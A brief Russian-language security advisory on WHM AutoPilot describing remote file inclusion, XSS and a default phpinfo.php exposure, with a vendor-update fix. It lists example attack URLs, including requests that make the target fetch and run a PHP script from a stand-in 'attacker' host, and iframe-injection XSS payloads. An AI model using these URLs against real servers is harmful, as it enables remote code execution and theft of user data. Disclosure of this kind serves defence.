Выполнение произвольных команд в WHM AutoPilot

Описание:
Обнаружено несколько уязвимостей в WHM AutoPilot. Удаленный атакующий может выполнить произвольные команды на системе, произвести XSS атаку, получит информацию о системе.

Уязвимость существует из-за некорректной обработки входных данных в некоторых переменных. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Примеры:

http://[target]/path/inc/header.php/step_one.php?server_inc=http://attacker/step_one_tables.php
http://[target]/path/inc/step _one_tables.php?server_inc=http://attacker/js_functions.php
http://[target]/path/inc/step_two_tables.php?server_inc=http://attacker/js_functions.php

Удаленный атакующий может произвести XSS атаку и получить доступ к важным данным пользователей. Уязвимость существует из-за некорректной обработки входных данных в некоторых переменных. Примеры:

http://[target]/path/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E
http://[target]/path/admin/them es/blue/header.php?http_images='%3E%3Ciframe%3E

В конфигурации по умолчанию на системе после установки WHM AutoPilot присутствует файл phpinfo.php. Удаленный атакующий может получить информацию о системе.

URL производителя: www.whmautopilot.com/index.php

Решение: Установите обновление
http://www.whmautopilot.com/index.php